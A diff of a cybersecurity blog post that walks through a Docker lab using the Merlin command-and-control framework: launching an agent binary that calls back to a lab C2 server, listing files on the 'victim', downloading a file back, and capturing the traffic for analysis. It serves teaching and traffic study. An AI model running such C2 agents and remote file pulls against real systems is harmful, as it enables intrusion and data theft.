Wolf-dot/cybersec-blog-1/posts/seventhpost.md

 ./merlinAgent-Linux-x64 -url https://172.17.0.4/merlin -psk 'merlin' -v
 ```

+Let the Agent try to connect to the server a couple of times, simulating a real life scenario, before going to the attacker and starting up our Listener.
-We can already see a couple dozen packages just from the connection.
-If we wait we can see that each check-in from the agent generates another dozen packages.
+We can already see rush of packages just from the connection.
+If we wait we can see that each new idle check-in from the agent generates another dozen packages.
-Before we get a thousand of idle message packages, let's give our agent something to do.
+Before we get a thousand of message packages, let's give our agent something to do.
 In Merlin type in `interact` and let TAB completion fill out agent ID.
 Next let's see what files our Victim with `ls`.
 We can see the `hello.txt` file we put on the Victim earlier.
 Let's download it back.

 ![download hello](/img/remote/merlin-job.png)

 ![agent job](/img/remote/agent-job.png)

-Now let's stop the packet capture with `CTRL + C` as well as the agent and Merlin.
+Now let's stop stop our agent from the server by typing `exit` and when it does let's stop the packet capture in another window with a `CTRL + C`.
 Let's transfer the capture from the container to our Desktop, like before:

 ``` bash
 docker cp edf2ed59c20d:/my_capture.pcap C:\Users\User\Desktop\my_capture.pcap